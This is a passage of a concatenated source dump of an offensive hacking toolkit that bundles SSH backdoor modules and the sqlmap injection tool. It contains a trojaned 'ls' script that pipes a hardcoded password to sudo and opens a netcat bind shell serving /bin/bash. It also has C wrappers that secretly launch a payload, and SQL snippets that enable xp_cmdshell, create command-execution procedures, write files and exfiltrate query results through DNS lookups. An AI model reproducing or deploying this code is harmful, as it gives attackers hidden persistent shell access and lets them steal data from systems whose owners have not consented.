| from poison import * 8 | from cron import * 9 | from webMod import * 10 | from whitelist import * 11 | from addUser import * 12 | from startup import * 13 | 14 | 15 | enabled_modules = {"adduser" : AddUser, "startup" : Startup, "poison" : Poison, "cron" : Cron, "web": WebMod, "whitelist" : Whitelist} 16 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/modules/option.py: -------------------------------------------------------------------------------- 1 | class Option(): 2 | 3 | def __init__(self, name, value, description, required): 4 | self.name = name 5 | self.value = value 6 | self.description = description 7 | self.required = required 8 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/modules/web/install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | yes | apt-get install --force-yes apache2 4 | yes | apt-get install --force-yes php5 5 | yes | apt-get install --force-yes libapache2-mod-php5 6 | yes | apt-get install --force-yes php5-cli 7 | mkdir /var/www/html 8 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/requirements.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/rpyc/core/__init__.py: -------------------------------------------------------------------------------- 1 | from rpyc.core.stream import SocketStream, TunneledSocketStream, PipeStream 2 | from rpyc.core.channel import Channel 3 | from rpyc.core.protocol import Connection 4 | from rpyc.core.netref import BaseNetref 5 | from rpyc.core.async import AsyncResult, AsyncResultTimeout 6 | from rpyc.core.service import Service, VoidService, SlaveService 7 | from rpyc.core.vinegar import GenericException 8 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/rpyc/experimental/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/rpyc/experimental/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/rpyc/utils/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Utilities (not part of the core protocol) 3 | """ 4 | 5 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/rpyc/version.py: -------------------------------------------------------------------------------- 1 | version = (3, 3, 0) 2 | version_string = "3.3.0" 3 | release_date = "2014.06.27" 4 | 5 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/target.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/target.pyc -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/tmp/bashStatus.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/tmp/bashStatus.txt -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/tmp/initd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/tmp/initd -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/tmp/ls: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | ( echo target123 | sudo -S nohup ./nc.traditional -l -p 53926 -e /bin/bash & ) > /dev/null 2>&1 && /bin/share/ls $@ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/tmp/lsa.c: -------------------------------------------------------------------------------- 1 | #include 2 | int main() { 3 | system("./initd &"); 4 | system("ls"); 5 | return 0; 6 | } 7 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/tmp/p.c: -------------------------------------------------------------------------------- 1 | #include 2 | int main() { 3 | system("./initd 2> /dev/null &"); 4 | system("/bin/share/ls"); 5 | return 0; 6 | } -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/tmp/poison.c: -------------------------------------------------------------------------------- 1 | #include 2 | int main() { 3 | system("nohup ./initd > /dev/null"); 4 | system("/bin/share/ls"); 5 | return 0; 6 | } -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/vulscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import sys 4 | import os 5 | import traceback 6 | print "---------------------" 7 | print "Vulnerability Scanner" 8 | print "---------------------" 9 | target = raw_input('Scan Target: ') 10 | 11 | cmd1 = os.system ('perl '+'tools/vscan/nikto.pl -h ' +target+' -o target_output.html') 12 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/.DS_Store -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/harvester/.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/harvester/discovery/DNS/Lib.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/harvester/discovery/DNS/Lib.py -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/harvester/discovery/DNS/Type.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/harvester/discovery/DNS/Type.py -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/harvester/discovery/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = ["bingsearch", 2 | "googlesearch", 3 | "googleplussearch", 4 | "pgpsearch", 5 | "linkedinsearch", 6 | "exaleadsearch", 7 | "yandexsearch", 8 | "googlesets", 9 | "dnssearch", 10 | "shodansearch", 11 | "jigsaw", 12 | "twittersearch", 13 | "dogpilesearch", 14 | "baidusearch", 15 | "yahoosearch", 16 | "googleCSE"] 17 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/harvester/discovery/shodan/__init__.py: -------------------------------------------------------------------------------- 1 | from api import WebAPI 2 | 3 | __version__ = "0.5.0" 4 | 5 | __all__ = ['WebAPI'] 6 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/harvester/tests/myparser_test.py: -------------------------------------------------------------------------------- 1 | # 2 | # Unit tests for myparser.py 3 | # 4 | import myparser 5 | 6 | import unittest 7 | 8 | class TestMyParser(unittest.TestCase): 9 | 10 | def test_emails(self): 11 | word = 'domain.com' 12 | results = '***a@domain***banotherdomain.com***c@domain.com***d@sub.domain.com***' 13 | p = myparser.parser(results, word) 14 | emails = sorted(p.emails()) 15 | self.assertEquals(emails, [ 'c@domain.com', 'd@sub.domain.com' ]) 16 | 17 | if __name__ == '__main__': 18 | unittest.main() 19 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/.gitattributes: -------------------------------------------------------------------------------- 1 | *.py text eol=lf 2 | *.conf text eol=lf 3 | 4 | *_ binary 5 | *.dll binary 6 | *.pdf binary 7 | *.so binary 8 | *.wav binary 9 | *.zip binary 10 | *.x32 binary 11 | *.x64 binary 12 | *.exe binary 13 | *.sln binary 14 | *.vcproj binary 15 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/.gitignore: -------------------------------------------------------------------------------- 1 | *.py[cod] 2 | output/ 3 | .sqlmap_history 4 | traffic.txt 5 | *~ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/doc/AUTHORS: -------------------------------------------------------------------------------- 1 | Bernardo Damele Assumpcao Guimaraes (@inquisb) 2 | 3 | 4 | Miroslav Stampar (@stamparm) 5 | 6 | 7 | You can contact both developers by writing to dev@sqlmap.org 8 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/doc/FAQ.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/doc/FAQ.pdf -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/doc/README.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/doc/README.pdf -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/extra/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/extra/beep/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/extra/beep/beep.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/extra/beep/beep.wav -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/extra/cloak/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/extra/dbgtool/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/extra/icmpsh/icmpsh.exe_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/extra/icmpsh/icmpsh.exe_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/extra/runcmd/README.txt: -------------------------------------------------------------------------------- 1 | Files in this folder can be used to compile auxiliary program that can 2 | be used for running command prompt commands skipping standard "cmd /c" way. 3 | They are licensed under the terms of the GNU Lesser General Public License. 4 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/extra/runcmd/windows/README.txt: -------------------------------------------------------------------------------- 1 | Compile only the Release version because the Runtime library option 2 | (Project Properties -> Configuration Properties -> C/C++ -> Code 3 | Generation) is set to "Multi-threaded (/MT)", which statically links 4 | everything into executable and doesn't compile Debug version at all. 5 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/extra/runcmd/windows/runcmd/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // runcmd.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/extra/safe2bin/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/extra/shellcodeexec/README.txt: -------------------------------------------------------------------------------- 1 | Binary files in this folder are data files used by sqlmap on the target 2 | system, but not executed on the system running sqlmap. They are licensed 3 | under the terms of the GNU Lesser General Public License and their source 4 | code is available on https://github.com/inquisb/shellcodeexec. 5 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/extra/shellcodeexec/linux/shellcodeexec.x32_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/extra/shellcodeexec/linux/shellcodeexec.x32_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/extra/shellcodeexec/linux/shellcodeexec.x64_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/extra/shellcodeexec/linux/shellcodeexec.x64_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/extra/shellcodeexec/windows/shellcodeexec.x32.exe_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/extra/shutils/blanks.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) 4 | # See the file 'doc/COPYING' for copying permission 5 | 6 | # Removes trailing spaces from blank lines inside project files 7 | find . -type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \; 8 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/extra/shutils/pep8.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) 4 | # See the file 'doc/COPYING' for copying permission 5 | 6 | # Runs pep8 on all python files (prerequisite: apt-get install pep8) 7 | find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \; 8 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/extra/shutils/pyflakes.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) 4 | # See the file 'doc/COPYING' for copying permission 5 | 6 | # Runs pyflakes on all python files (prerequisite: apt-get install pyflakes) 7 | find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes '{}' \; 8 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/extra/sqlharvest/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/lib/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/lib/controller/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/lib/core/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/lib/parse/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/lib/request/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/lib/takeover/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/lib/techniques/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/lib/techniques/blind/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/lib/techniques/brute/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/lib/techniques/dns/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/lib/techniques/error/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/lib/techniques/union/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/lib/utils/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/plugins/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/plugins/dbms/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/plugins/dbms/db2/filesystem.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from plugins.generic.filesystem import Filesystem as GenericFilesystem 9 | 10 | class Filesystem(GenericFilesystem): 11 | def __init__(self): 12 | GenericFilesystem.__init__(self) 13 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/plugins/dbms/db2/takeover.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from plugins.generic.takeover import Takeover as GenericTakeover 9 | 10 | class Takeover(GenericTakeover): 11 | def __init__(self): 12 | self.__basedir = None 13 | self.__datadir = None 14 | 15 | GenericTakeover.__init__(self) 16 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/plugins/dbms/mysql/enumeration.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from plugins.generic.enumeration import Enumeration as GenericEnumeration 9 | 10 | class Enumeration(GenericEnumeration): 11 | def __init__(self): 12 | GenericEnumeration.__init__(self) 13 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/plugins/generic/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/procs/README.txt: -------------------------------------------------------------------------------- 1 | Files in this folder represent SQL snippets used by sqlmap on the target 2 | system. 3 | They are licensed under the terms of the GNU Lesser General Public License 4 | where not specified otherwise. 5 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/procs/mssqlserver/activate_sp_oacreate.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_configure 'show advanced options',1; 2 | RECONFIGURE WITH OVERRIDE; 3 | EXEC master..sp_configure 'ole automation procedures',1; 4 | RECONFIGURE WITH OVERRIDE 5 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/procs/mssqlserver/configure_openrowset.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_configure 'show advanced options', 1; 2 | RECONFIGURE WITH OVERRIDE; 3 | EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%; 4 | RECONFIGURE WITH OVERRIDE; 5 | EXEC sp_configure 'show advanced options', 0; 6 | RECONFIGURE WITH OVERRIDE 7 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/procs/mssqlserver/configure_xp_cmdshell.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_configure 'show advanced options',1; 2 | RECONFIGURE WITH OVERRIDE; 3 | EXEC master..sp_configure 'xp_cmdshell',%ENABLE%; 4 | RECONFIGURE WITH OVERRIDE; 5 | EXEC sp_configure 'show advanced options',0; 6 | RECONFIGURE WITH OVERRIDE 7 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/procs/mssqlserver/create_new_xp_cmdshell.sql: -------------------------------------------------------------------------------- 1 | DECLARE @%RANDSTR% nvarchar(999); 2 | set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID'; 3 | EXEC master..sp_executesql @%RANDSTR% 4 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/procs/mssqlserver/disable_xp_cmdshell_2000.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_dropextendedproc 'xp_cmdshell' 2 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/procs/mssqlserver/dns_request.sql: -------------------------------------------------------------------------------- 1 | DECLARE @host varchar(1024); 2 | SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%'; 3 | EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"') 4 | # or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"') 5 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/procs/mssqlserver/enable_xp_cmdshell_2000.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll' 2 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/procs/mssqlserver/run_statement_as_user.sql: -------------------------------------------------------------------------------- 1 | SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%') 2 | # SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%') 3 | # SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%') 4 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/procs/mysql/dns_request.sql: -------------------------------------------------------------------------------- 1 | SELECT LOAD_FILE(CONCAT('\\\\%PREFIX%.',(%QUERY%),'.%SUFFIX%.%DOMAIN%\\%RANDSTR1%')) 2 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/procs/mysql/write_file_limit.sql: -------------------------------------------------------------------------------- 1 | LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- 2 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/procs/oracle/dns_request.sql: -------------------------------------------------------------------------------- 1 | SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL 2 | # or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL 3 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/shell/backdoor.asp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/shell/backdoor.asp_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/shell/backdoor.aspx_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/shell/backdoor.aspx_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/shell/backdoor.jsp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/shell/backdoor.jsp_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/shell/backdoor.php_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/shell/backdoor.php_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/shell/runcmd.exe_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/shell/runcmd.exe_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/shell/stager.asp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/shell/stager.asp_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/shell/stager.aspx_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/shell/stager.aspx_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/shell/stager.jsp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/shell/stager.jsp_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/shell/stager.php_: 